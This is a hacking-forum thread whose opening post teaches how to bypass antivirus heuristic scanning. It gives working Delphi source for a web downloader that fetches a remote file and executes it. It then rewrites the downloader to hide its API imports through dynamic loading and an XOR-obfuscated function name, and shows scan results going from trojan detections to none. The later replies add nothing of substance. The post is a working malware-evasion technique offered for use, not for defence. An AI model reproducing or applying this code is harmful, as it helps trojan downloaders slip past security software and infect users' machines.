Results 1 to 4 of 4
  1. #1
    Tsutomu Shimomura Avatar of -=Player=-
    Registered since
    15.02.2006
    Posts
    1.549

    [B] Bypassing the heuristic scan

    The antivirus heuristic scan bypasser. Nowadays, the majority of AV software uses an integrated heuristic function to detect suspicious code and APIs that are commonly used by viruses, trojans and other malware. Their goal is to detect viruses without manually adding a signature offset for each virus. They will be able to detect viruses before they are released publicly. In this article I will try to show you how to bypass the heuristic scan.

    How can we do that?
    I will use an example by Lord; we'll make a simple web downloader which uses the widely used API "URLDownloadToFile". This API is flagged by the heuristic scanner as suspicious code.

    Delphi code:
    Code:
    program Project2;

    {$APPTYPE CONSOLE}

    uses
      URLMon, Windows,
      ShellApi,
      SysUtils;

    begin
      // Both calls are static imports, so URLDownloadToFileA and ShellExecuteA
      // are listed in the executable's import table.
      URLDownloadToFile(nil, PChar('http://fahde.free.fr/bug/rel/ICrypt%201.0.rar'), PChar('C:\ICrypt.rar'), 0, nil);
      ShellExecute(0, 'open', PChar('C:\ICrypt.rar'), nil, nil, SW_SHOW);
    end.
    After you have compiled this source, try scanning it with an antivirus. A report from VirusTotal gives these results:

    Ikarus: Trojan-Downloader.Win32.Banload.BQ
    Bit defender: BehavesLike:Trojan.Downloader
    NOD32: NewHeur_PE probably unknown virus

    Well, this doesn't look very good for us. Now a beginner would ask himself: how in the world could they detect my own privately coded web downloader? I didn't even release it on the internet.

    The heuristic scanners do not count the URLDownloadToFile API alone as a threat, but combined with ShellExecute they do. Let me explain: when our application wants to call the URLDownloadToFile function, it does not call it directly from the .DLL file that contains the function (urlmon.dll); it instead calls it from memory. But an EXE/DLL file does not know, for example, where the ShellExecute API is located in memory, therefore it uses the IAT (Import Address Table). The IAT knows where the API is located in memory, so our application gets access to the API through the IAT.

    Now that we know how the heuristic works, it's time to bypass it. All APIs which our application uses are listed in the IAT; the antiviruses scan the IAT, and if our API is there they'll detect it.
    So to make our API not appear in the IAT we will use two other APIs which the antivirus software does not suspect: LoadLibrary and GetProcAddress. These two APIs, with the help of a small encoding routine, will dynamically load urlmon.dll, which contains the function URLDownloadToFile. Now we don't need to ask the IAT for the location of our APIs because we are loading them independently.

    Time To Re-Code:
    Code:
    program Project2;

    {$APPTYPE CONSOLE}
    // By BuGGz : www.instinct-coders.tz4.com

    uses
      Windows, Dialogs,
      ShellApi,
      SysUtils;

    type
      // Declare the function with the correct parameters (the signature of
      // URLDownloadToFileA in urlmon.dll) so we can call it through a pointer later.
      TMyProc = function(Caller: IUnknown; URL: PChar; FileName: PChar;
        Reserved: DWORD; LPBINDSTATUSCALLBACK: Pointer): HResult; stdcall;

    // The decoding routine: the low nibble of every character is XORed with the
    // low nibble of the cycling key character and with 10; the high nibble is
    // left untouched. Applying it twice restores the original string.
    function Decrypt(Str: string; Key: string): string;
    var
      Y, Z: Integer;
      B: Byte;
    begin
      Z := 1;
      for Y := 1 to Length(Str) do
      begin
        B := (Ord(Str[Y]) and $0F) xor (Ord(Key[Z]) and $0F);
        B := B xor 10;
        Str[Y] := Char((Ord(Str[Y]) and $F0) + B);
        Inc(Z);
        if Z > Length(Key) then Z := 1;
      end;
      Result := Str;
    end;

    var
      Handle: THandle;
      Maproc: TMyProc;
      Decrypte: string;
    begin
      // ']ZDLgfdgil\gNadmI' decoded with key '2' is the name of the export we want.
      Decrypte := Decrypt(']ZDLgfdgil\gNadmI', '2');
      ShowMessage(Decrypte); // to make sure that the final result is good
      Handle := LoadLibrary('Urlmon.dll'); // load the DLL
      if Handle <> 0 then
      begin
        try
          // Resolve the function dynamically from the DLL using the decoded name,
          // so the import never appears in the IAT.
          @Maproc := GetProcAddress(Handle, PChar(Decrypte));
          if @Maproc <> nil then
          begin
            // This is the download function, called through the pointer named Maproc
            Maproc(nil, 'http://fahde.free.fr/bug/rel/ICrypt%201.0.rar', 'C:\ICrypt.rar', 0, nil);
            // ShellExecute takes a window handle as its first parameter, not the
            // module handle, so pass 0 here as the first version did.
            ShellExecute(0, 'open', PChar('C:\ICrypt.rar'), nil, nil, SW_SHOW);
          end;
        finally
          FreeLibrary(Handle); // free the DLL after we've used it
        end;
      end;
    end.
    Scan after compiling:

    Ikarus: No virus found in memory
    Bit defender: No virus found in memory
    NOD32 : No virus found in memory

    No hard feelings, AVs.

    Credits :
    All the credits go to Lord, since I just translated his code into Delphi.
    BuGGz, www.instinct-coders.tz4.com

  2. #2
    ɃǐᴛċἨ ♥ ᴌṓⱴἐ Avatar of CreativeFrags
    Registered since
    25.03.2006
    Posts
    170

    I want it in German again xD
    Oh man, now I have to read for so long...

    *reads through and maybe edits afterwards*

    Thx anyway.. sounds useful

  3. #3
    Bad Times Virus
    Registered since
    03.08.2007
    Posts
    646

    ~
    Edited by nemo (08.01.2016 at 10:36)


  4. #4
    Tron Avatar of gORDon_vdLg
    Registered since
    23.07.2007
    Posts
    801

    For those who want it in German: Loading DLLs at runtime
    http://www.delphi-treff.de/tutorials...l/dlls/page/7/
